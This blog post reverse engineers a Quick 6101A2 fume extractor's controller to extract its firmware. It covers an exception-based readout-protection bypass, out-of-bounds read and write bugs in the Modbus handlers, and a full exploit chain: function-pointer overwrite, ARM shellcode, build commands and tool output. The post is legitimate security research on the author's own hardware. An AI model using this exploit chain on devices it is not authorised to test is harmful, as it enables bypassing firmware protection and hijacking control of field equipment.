Reverse Engineering Quick 6101A2: Can I have your firmware?

In the previous post, we mapped the Modbus RTU protocol used by the Quick 6101A2 remote controller. The next target is the external tool protocol, but I don't have a compatible tool that speaks it, nor any captured traffic. That makes black-box reversing mostly guesswork. In this post, we find and exploit vulnerabilities in the 6101A2 to extract its firmware, letting us reverse the protocol from actual code instead of trial and error. As Dave Jones says:

Don't turn it on, take it apart!

Show Your Internals

The unit itself is easy to open, with the bottom shell held by a few Phillips head screws. The design is very typical: two boards, one for high power DC motor driving and one for the main controller, plus the motor itself.

Quick 6101A2 inside view The controller board on the left and the motor driver on the right.

We care about the main controller board, and a closer inspection of the ICs tells a clear story:

The main microcontroller is an STM32 clone: Geehy APM32F103CBT6.
The remote controller port is USB-A and connects to the MCU through a MAX3232 RS-232 driver.
The extra tool connector is RJ-11 and runs through an SN65LBC184DR RS-485 transceiver that is isolated with optocouplers.
The board has a 32k ATMLH412 EEPROM that most likely stores user settings.
The 4-pin Serial Wire Debug (SWD) header is located and populated at the top right corner.

Main Controller PCB The main controller board.

From the parts alone, we can conclude that the external tool speaks RS-485. The application protocol is still unknown, though. It might be Modbus RTU like the remote controller, but before we throw random bytes at the port, let's check the firmware protections through SWD. I connected the debugger and queried the option bytes to verify the current Readout Protection (RDP) level. We weren't that lucky and the RDP is set to level 1, as shown in the OpenOCD output below.

> stm32f1x options_read 0
device id = 0x20036410
STM32 flash size failed, probe inaccurate - assuming 128k flash
flash size = 128 KiB
option byte register = 0x2a92bfe
write protection register = 0xffffffff
read protection: on
watchdog: software
stop mode: no reset generated upon entry
standby mode: no reset generated upon entry
user data = 0xaa4a

RDP level 1 locks down the flash when a debugger is attached. In this mode, any direct read request triggers a bus error. However, the program can still access it normally when the microcontroller boots from flash.

Exception-Driven Extraction

While researching RDP bypasses, I found an excellent article by Marc Schink and Johannes Obermaier. They show how to leak flash contents by abusing exception handling. In a later paper, they demonstrate that several STM32 clones are vulnerable to the same issue. Geehy parts were not tested, but the results strongly suggested they might be affected too.

The ARM Cortex-M3 core uses two separate buses to access flash. ICode handles instruction fetches, while DCode handles literal loads and debugger access. Schink and Obermaier observed that under RDP1, attaching a debugger blocks flash reads over the data bus, but the instruction bus can still fetch from flash.

STM32 high-level architecture The high-level architecture of the STM32F103 microcontroller.¹

During an exception, the core reads an entry from the vector table and loads it into the program counter (PC). That behavior leaks protected flash data because exception vectors are still fetched from flash over ICode, even with a debugger attached. The attack exploits this by triggering exceptions and recording the resulting PC values.

On its own, leaking the original vector table does not help much. The key is that the debugger can write the Vector Table Offset Register (VTOR), which relocates the table base. By repeatedly moving VTOR and triggering exceptions, we can scan through flash. Some entries are reserved or not tied to real exceptions, so portions remain unreachable, but the technique still recovers roughly 90% of the firmware, depending on table layout.

I did not want to brick the actual controller while testing, so I started with a separate Geehy devboard. My local supplier did not have a devboard with the exact same microcontroller as the fume extractor, but I found a close match in the same family. If the flaw exists there, it is likely present in other models that share the same high-level architecture.

The test setup is simple. I built a dummy firmware with a long ASCII string at 0x5800, flashed it, and enabled RDP level 1. Then I attached a debugger, relocated the vector table to that address, and triggered an exception, as shown in the OpenOCD output below.

> reset halt                   # Reset and halt the CPU
> cortex_m maskisr off         # Disable interrupt masking
> mww 0xE000ED08 0x08005800    # Relocate vector table to point our test string
> mww 0xE000ED04 0x04000000    # Trigger SysTick exception
> step                         # Single step to trigger the exception
[apm32f1x.cpu] halted due to single-step, current mode: Handler SysTick
xPSR: 0x0100000f pc: 0x4f4f4f4e msp: 0x2000ffe0

After entering the exception handler, the PC register holds 0x4f4f4f4e. Promising: those bytes clearly look like ASCII. The SysTick vector sits at offset 0x3c, so we expect the original image value at 0x5800 + 0x3C = 0x583c. At first glance it looks off, but only by one bit.

$ xxd -e -s 0x583C -l 0x04 test-firmware.bin
0000583c: 4f4f4f4f

On Cortex-M3, the least significant bit is not part of the address loaded into PC because instructions are aligned to least 16 bit. Instead, the LSB encodes instruction-set state (Thumb) in the Execution Program State Register (EPSR). We can read it from xPSR in OpenOCD output. Here, xPSR is 0x0100000f, so bit 24 (the T flag) is set. Therefore the true vector entry is 0x4f4f4f4e | 1 = 0x4f4f4f4f, which matches the test firmware.

That confirms this Geehy microcontroller is vulnerable. Time to try it on the real device. Schink and Obermaier also released stm32f1-firmware-extractor with their original post, which automates the process. Using it, I extracted almost the entire firmware image from my fume extractor.

$ python3 main.py --value 0xaaaaaaaa \
    --binary 0x08000000 32768 |stdbuf -o0 xxd -e
00000000: aaaaaaaa aaaaaaaa 08002c63 0800196d  ........c,..m...
00000010: 08002c61 080005f1 08003295 aaaaaaaa  a,.......2......
00000020: aaaaaaaa aaaaaaaa aaaaaaaa 08000101  ................
00000030: 0800064d aaaaaaaa 08000145 08002c85  M.......E....,..
00000040: 080001b3 080001b3 080001b3 080001b3  ................
00000050: 080001b3 080001b3 080001b3 080001b3  ................
00000060: 080001b3 080001b3 080001b3 080001b3  ................
00000070: 080001b3 080001b3 080001b3 080001b3  ................
00000080: 080001b3 080001b3 080001b3 080001b3  ................
00000090: 080001b3 080001b3 080001b3 0800064f  ............O...
000000a0: 080001b3 080001b3 080001b3 080001b3  ................
000000b0: 08002d51 080001b3 080001b3 080001b3  Q-..............
000000c0: 080001b3 080001b3 080001b3 080001b3  ................
000000d0: 080001b3 0800318d 08003211 080001b3  .....1...2......
000000e0: 080001b3 080001b3 080001b3 d00cf8df  ................
000000f0: f9d2f000 47004800 08003d09 20004888  .....H.G.=...H.
...

In the snippet above, extraction starts at flash base 0x08000000 and scans the full 128 kB region. Any gaps the method cannot recover are filled with 0xaaaaaaaa.

Even though we are missing about ten percent of the firmware, the gaps are spread across the image, which means we are missing a few instructions here and there. That is not a big deal, since it is still enough to reverse engineer the device functionality. However, if we want to modify the existing firmware, we need the full dump. Reflashing means disabling readout protection, which erases the entire flash.

So before digging into the external-tool protocol, I want to first look for vulnerabilities inside the partial dump that could yield a complete firmware extraction. The natural starting point is Modbus RTU handling, since we already know the remote uses it to read and write device state.

Quick Modbus Recap

I already covered Modbus RTU in the previous post, but a short recap helps set the stage. A Modbus frame carries a device address, a function code, a payload, and a CRC. The function code tells the device what to do and how to interpret the payload.

The remote controller uses two functions. Read Holding Registers (function code 0x03) reads a slice of the register map by specifying a start address and quantity. Preset Single Register (function code 0x06) writes one register by supplying its address and new value.

Read Holding Registers Handler

The handler code starts by validating the requested register quantity, which cannot be greater than 32 as shown in the disassembly below. That is already intresting because the remote controller never reads more than the first 23 registers.

LDRH    R2, [R1,#(rx_buf+4)] ; qty   = rx_buf[4..5]
LDRH    R0, [R1,#(rx_buf+2)] ; start = rx_buf[2..3]
REV16   R2, R2
REV16   R0, R0
CMP     R2, #0x20            ; qty > 0x20 => send error message
BHI     set_error_code

After the quantity check, the handler does not validate the starting address. It blindly adds the user-controlled start offset to the register-map base and reads the requested number of 16-bit values in a loop.

read_loop:
ADD.W   R6, R10, R0,LSL#1 ; reg_addr = reg_base + 2*start
ADD.W   R7, R3, R4,LSL#1  ; slot     = buff + 2*i
LDRH.W  R6, [R6,#0x40]    ; value    = *(reg_addr + 0x40)
ADDS    R0, R0, #1        ; start++
MOV.W   R12, R6,LSR#8
STRB.W  R12, [R7]         ; slot[0]  = HIBYTE(value)
ADDS    R4, R4, #1        ; i++
STRB    R6, [R7,#1]       ; slot[1]  = LOBYTE(value)

In C, this would look something like this:

uint16_t start = (uint16_t)(rx_buf[2] << 8) | rx_buf[3];
uint16_t qty   = (uint16_t)(rx_buf[4] << 8) | rx_buf[5];

if (qty > 0x20) {
    // send error message
    return;
}

uint16_t i = 0;
while (i < qty) {
    uint16_t value = *(uint16_t*)(reg_base + 2*start + 0x40);
    // ...
    start++;
    i++;
}

This gives us an out-of-bounds read primitive: choose a large start address and the handler walks beyond the register map. Since the start field is 16-bit and each register is 16-bit, the reachable span is 2 * 64k = 128k. On this microcontroller, RAM is only 20 kB, so we can effectively dump the remaining RAM after the map. Annoyingly, RAM is mapped at 0x20000000, which sits below flash at 0x08000000, so we cannot reach flash through this vulnerability.

Preset Single Register Handler

The write handler starts by extracting the register index and value from the received frame. Unlike the read handler, it validates neither fields before passing both straight to a subroutine.

LDRH    R0, [R4,#(rx_buf+2)]  ; reg_idx = rx_buf[2..3]
LDRH    R1, [R4,#(rx_buf+4)]  ; value   = rx_buf[4..5]
REV16   R0, R0
REV16   R1, R1
BL      modbus_write_reg      ; modbus_write_reg(reg_idx, value)

The helper function computes the destination address from the map base and the provided index, then writing the new value to it. Only afterward does it check that the index is below 20, as shown here.

modbus_write_reg:
PUSH.W  {R4-R8,LR}
LDR     R4, =reg_struct_base
ADD.W   R2, R4, R0,LSL#1      ; addr = reg_struct_base + 0x40 + 2*reg_idx
STRH.W  R1, [R2,#0x40]        ; *addr = value
CMP     R0, #0x14             ; value >= 0x14 => return

Past that validation, there is additional logic that triggers side effects based on the register index, but we can ignore it for now. In C, the handler is roughly:

void modbus_handle_fc06_write_single(void) {
    uint16_t idx = (uint16_t)(rx_buf[2] << 8) | rx_buf[3];
    uint16_t val = (uint16_t)(rx_buf[4] << 8) | rx_buf[5];
    if (modbus_write_reg(idx, val) != 1) {
        // send error message ..
        return;
    }
    // send echo ...
}

int modbus_write_reg(uint16_t idx, uint16_t val) {
    uint16_t* reg_addr = (uint16_t*)reg_base + 0x40 + 2*idx;
    *reg_addr = val;

    if (idx >= 0x14) {
        return 1;
    }
    // rest of the logic ...
}

So, by providing a large register index, we get an out-of-bounds write past the register map. The constraints mirror the read primitive: we can only target memory after the map, within the same 128 kB span, not arbitrary addresses. With that constraint, can we overwrite anything there that redirects control flow?

Taking The Control

With the write primitive, placing shellcode in RAM is easy. The hard part is control flow: we still need a writable pointer we can hijack, such as a return address or function pointer.

We could hunt candidates with the read primitive, but RDP does not protect RAM, so it is faster to dump full RAM via OpenOCD and inspect it directly. Loading that dump into a disassembler is especially helpful because you can see real runtime values behind globals and indirect references.

> halt
> dump_image ram.bin 0x20000000 0x5000

In the dump, I found a small interface table below the register map used for settings persistence. Conveniently, modbus_write_reg reaches this table indirectly to fetch a function pointer when saving updated values to EEPROM. The core flow looks like this:

typedef struct {
    int (*init)(void);
    int (*write)(uint16_t aadr, const uint8_t* src, uint16_t len);
    int (*read)(uint16_t aadr, uint8_t* dst, uint16_t len);
} SettingInterface;

SettingInterface* settings;

int some_init_func(void) {
    // ...
    settings = (SettingInterface*)malloc(sizeof(SettingInterface));
    if (!settings) return 1;
    settings->init  = eeprom_init;
    settings->write = eeprom_write_buf;
    settings->read  = eeprom_read_buf;
    // ...
}

int modbus_write_reg(uint16_t idx, uint16_t val) {
    uint16_t* reg_addr = (uint16_t*)reg_base + 0x40 + 2*idx;
    *reg_addr = val;

    if (idx >= 0x14) {
        return 1;
    }

    switch(idx) {
        case 0x01:
            settings->write(0xf0, reg_addr, sizeof(uint16_t));
            break;
        // ...
    }
}

The global settings pointer itself sits at the very top of RAM at 0x20000008, so we cannot overwrite it. However, the heap object it points to lands in a read/write region we can reach. A potential attack is to place shellcode in unused RAM, overwrite SettingsInterface.write to point at it, and then trigger a legitimate register write that calls write. The settings vtable is heap allocated, but the allocation happens so early during initialization that it seems to end up in the same location every time.

You Wouldn't Download A Fume Extractor

To extract the full firmware, we need a small payload that reads flash byte by byte and sends it over the same serial port used by the remote controller. The dumper code itself is straightforward, but a few constraints matter:

We want to disable all maskable interrupts to avoid interruptions from timers, the task scheduler, or other background activity.
The firmware uses the independent watchdog (IWDG), so we need to keep it happy.
Busy loop after a successful dump so we can power down the device in a controlled way.

.syntax unified
.thumb
.global blob_entry
.type blob_entry, %function
.section .text.blob_entry, "ax", %progbits

.equ BUF_ADDR,    0x08000000      ; Flash base address
.equ BUF_LEN,     0x20000         ; Flash size

.equ USART_BASE,  0x40004400      ; USART2 base register

.equ SR_TXE_BIT,  (1<<7)          ; USART_SR.TXE: TX data register empty

.equ IWDG_KR,      0x40003000     ; IWDG key register address (KR)
.equ IWDG_RELOAD,  0xAAAA         ; Reload key: resets watchdog counter

blob_entry:
    cpsid i                       ; Disable all maskable interrupts

    ldr   r2, =USART_BASE         ; r2 = USART2 base
    ldr   r0, =BUF_ADDR           ; r0 = buffer pointer
    ldr   r1, =BUF_LEN            ; r1 = length

    ldr   r4, =IWDG_KR            ; r4 = &IWDG_KR (fixed address)
    ldr   r5, =IWDG_RELOAD        ; r5 = 0xAAAA reload key

1:  cbz   r1, 3f                  ; if len == 0, done

2:  str   r5, [r4, #0]            ; IWDG_KR = 0xAAAA (kick watchdog)
    ldr   r3, [r2, #0]            ; r3 = USART_SR
    tst   r3, #SR_TXE_BIT         ; TXE set?
    beq   2b                      ; wait until TXE==1

    ldrb  r3, [r0], #1            ; r3 = *buf++
    str   r3, [r2, #4]            ; USART_DR = byte

    subs  r1, r1, #1              ; len--
    b     1b

3:  str   r5, [r4, #0]            ; IWDG_KR = 0xAAAA (kick watchdog)
    b     3b                      ; forever loop

The assembly stub can be compiled into a flat shellcode with the commands below. The payload.ld linker script is omitted here, and can be found in the GitHub repo alongside the other tooling.

$ arm-none-eabi-as -mcpu=cortex-m3 -mthumb -o payload.o payload.S
$ arm-none-eabi-ld -T payload.ld -o payload.elf payload.o
$ arm-none-eabi-objcopy -O binary payload.elf payload.bin

I wrote a small Python utility, qu-tool.py, to invoke the read/write primitives. First, we copy the payload into RAM. The location does not really matter, so I chose a large zeroed region at 0x20004390.

$ qu-tool.py read --addr 0x20004390 --size 0x40
20004390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
200043A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
200043B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
200043C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

$ qu-tool.py write --addr 0x20004390 --input payload.bin
[*] Wrote 52 bytes starting at 0x20004390

$ qu-tool.py read --addr 0x20004390 --size 0x40
20004390: 72 B6 0A 4A 4F F0 00 60 4F F4 00 31 08 4C 4A F6  r..JO..`O..1.LJ.
200043A0: AA 25 49 B1 13 68 13 F0 80 0F FB D0 10 F8 01 3B  .%I..h.........;
200043B0: 53 60 25 60 01 39 F4 E7 25 60 FD E7 00 44 00 40  S`%`.9..%`...D.@
200043C0: 00 30 00 40 00 00 00 00 00 00 00 00 00 00 00 00  .0.@............

Next, we patch the write function pointer in SettingInterface at 0x200042C4 to point to 0x20004390. Note that the LSB is set to 1 to use the Thumb instruction set.

$ qu-tool.py read --addr 0x200042C0 --size 0x0C
200042C0: BD 04 00 08 6D 05 00 08 E7 04 00 08              ....m.......

$ qu-tool.py write --addr 0x200042C4 --data "91 43 00 20"
[*] Wrote 4 bytes starting at 0x200042C4

$ qu-tool.py read --addr 0x200042C0 --size 0x0C
200042C0: BD 04 00 08 91 43 00 20 E7 04 00 08              .....C. ....

Finally, we perform a register write that reaches write, and the shellcode sends the full firmware.

$ qu-tool.py trigger --output fw.bin
[+] Triggering
[*] Reading: 0x20000...
[+] Done
[+] Dump stored: fw.bin

$ xxd -e fw.bin | head
00000000: 20004888 08000199 08002c63 0800196d   .H. ....c,..m...
00000010: 08002c61 080005f1 08003295 00000000   a,.......2......
00000020: 00000000 00000000 00000000 08000101   ................
00000030: 0800064d 00000000 08000145 08002c85   M.......E....,..
00000040: 080001b3 080001b3 080001b3 080001b3   ................
00000050: 080001b3 080001b3 080001b3 080001b3   ................
00000060: 080001b3 080001b3 080001b3 080001b3   ................
00000070: 080001b3 080001b3 080001b3 080001b3   ................
00000080: 080001b3 080001b3 080001b3 080001b3   ................
00000090: 080001b3 080001b3 080001b3 0800064f   ............O...

$ shasum fw.bin
3e62524f2d170719374bc639ce9bec35d14fbf5b  fw.bin

The approach above still depends on hardcoded addresses from the partial dump, which is not practical. In addition, the exact addresses can also change between firmware versions. So I built a fully self-contained extractor that first leaks the register map base with the read primitive. It increments register indices until replies stop, indicating we hit RAM bounds and triggered an access fault. Knowing RAM base and size, we compute register_map_base as ram_base + ram_size - 2*last_reg_index - 2. During the same scan, simple pattern matching can locate both the settings table and a safe RAM region for shellcode.

You can find all above tooling from the qu6101a2-firmware-extractor repo.

Next Steps

With a full dump, we can now reverse the exact protocol on the external-tool connector. We can also start applying small patches. For example, I would like to remove the motor auto-start behavior on power-up. In a long rung, we could even implement an open source firmware for it. However, I will save those for future posts.

STMicroelectronics, RM0008 STM32F101xx/102xx/103xx/105xx/107xx Reference Manual